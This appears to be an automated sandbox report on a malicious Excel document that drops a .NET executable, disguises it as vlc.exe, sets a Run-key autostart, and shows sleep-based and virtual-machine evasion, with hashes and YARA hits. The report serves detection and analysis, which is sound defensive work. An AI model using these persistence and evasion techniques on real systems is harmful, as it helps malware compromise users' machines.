Source: 26.0.kzsuoseu.exe.e30000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 26.0.kzsuoseu.exe.e30000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: vlc.exe.28.dr, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: vlc.exe.28.dr, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 28.0.kzsuoseu.exe.f40000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 28.0.kzsuoseu.exe.f40000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 28.2.kzsuoseu.exe.f40000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 28.2.kzsuoseu.exe.f40000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 30.0.kzsuoseu.exe.ba0000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 30.0.kzsuoseu.exe.ba0000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 30.2.kzsuoseu.exe.ba0000.1.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 30.2.kzsuoseu.exe.ba0000.1.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 31.0.kzsuoseu.exe.330000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 31.0.kzsuoseu.exe.330000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 31.2.kzsuoseu.exe.330000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 31.2.kzsuoseu.exe.330000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 32.0.kzsuoseu.exe.510000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 32.0.kzsuoseu.exe.510000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 32.2.kzsuoseu.exe.510000.1.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 32.2.kzsuoseu.exe.510000.1.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'

Source: C:\Users\Public\kzsuoseu.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN			Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe			Jump to behavior

Source: C:\Users\Public\kzsuoseu.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc			Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3762	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3999	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4304	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2230	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816	Thread sleep count: 3762 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840	Thread sleep count: 3999 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5400	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5008	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 5340	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe TID: 4492	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe TID: 5088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe TID: 5888	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe TID: 6076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\Public\kzsuoseu.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\Public\kzsuoseu.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Users\Public\kzsuoseu.exe	Last function: Thread delayed

Source: powershell.exe, 00000016.00000002.496165200.0000022BEDD0D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln1
Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: kzsuoseu.exe, 0000001C.00000002.508505553.0000000003491000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000016.00000002.493294610.0000022BEDB5B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000015.00000002.479717397.000001F1C289D000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.dll
Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000015.00000002.480262467.000001F1C2B40000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Process token adjusted: Debug

Source: C:\Users\Public\kzsuoseu.exe	Memory written: C:\Users\Public\kzsuoseu.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Memory written: C:\Users\Public\kzsuoseu.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: Yara match	File source: 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.510414491.00000000031C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.511341965.00000000032E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.509988103.0000000004491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzsuoseu.exe PID: 4980, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzsuoseu.exe PID: 340, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzsuoseu.exe PID: 2908, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzsuoseu.exe PID: 1276, type: MEMORY
Source: Yara match	File source: 30.2.kzsuoseu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.kzsuoseu.exe.400000.0.unpack, type: UNPACKEDPE

Analysis Report x2hGv.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

ID:	324119
Product:	CloudBasic
Start time:	12:00:22
Start date:	28.11.2020
Sample:	x2hGv.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	9e7c47bf75405a4007da5989a93e14ae
SHA1:	6f52910e199f61d3c4a6d165266322aa7e40beea
SHA256:	7937e499e1d7ddb1cf32b451e5745a70a1878fa658958cd64b1ff46142608bba
Filetype:	Microsoft Excel sheet (30009/1) 47.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\kzsuoseu.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	B7679C443E22238291F5603F016FF56E	8E17BEE5C61B8383A3AD6F16701A204A62F6D05A	BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kzsuoseu.exe.log	ASCII text, with CRLF line terminators	E87C60A24438CC611338EA5ACB433A0A	E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD	80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\915FEC95-1606-493C-B7E6-1E4392ED10F8	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	2FBF7747DDA1A11CFDBC3CD2B537C3D6	44318DC9DDAB684378A63AB897C23CCF672DD3F8	0232493B6E1D78566ED3570011A862AFF0053E3B6D97EF8CC4825A76E3472EAB
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	782ADD355EA12D0B95EDAD79ECB5C28B	89060030E954C0BE979FCBFE0288DBB09ECD843E	32B6318D3D1F0CE26E68DC980A406D82BFF85FDDC54ABDBACCE32ED0F5CAD11F
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hrp4d1r.dmh.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_begaqbs1.run.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0jepr4x.aqp.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjosyhgz.fm3.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC	Little-endian UTF-16 Unicode text, with CR line terminators	7962B839183642D3CDC2F9CEBDBF85CE	2BE8F6F309962ED367866F6E70668508BC814C2D	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	B7679C443E22238291F5603F016FF56E	8E17BEE5C61B8383A3AD6F16701A204A62F6D05A	BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
C:\Users\user\Documents\20201128\PowerShell_transcript.472847.mNQ4U7A3.20201128120249.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	0FB120C829BCD27A6BAD0D24C39F2C9C	16589189DA80041A76112CB923DC9F12B4911B83	C89ACA82B6CC9985F88A24B9C205F7597C29E677F433F41A0F6C9F9E1FB4DF7D
C:\Users\user\Documents\20201128\PowerShell_transcript.472847.zoRxbWTq.20201128120249.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	62CABA494FCFF31EB14193C2704AEB2F	D920FBD1A9803DD57EFB4F601D3C96E2505F39DE	226233792062118037B36CAAFAF26A56167C0DB969A133007F903677C8A6D64C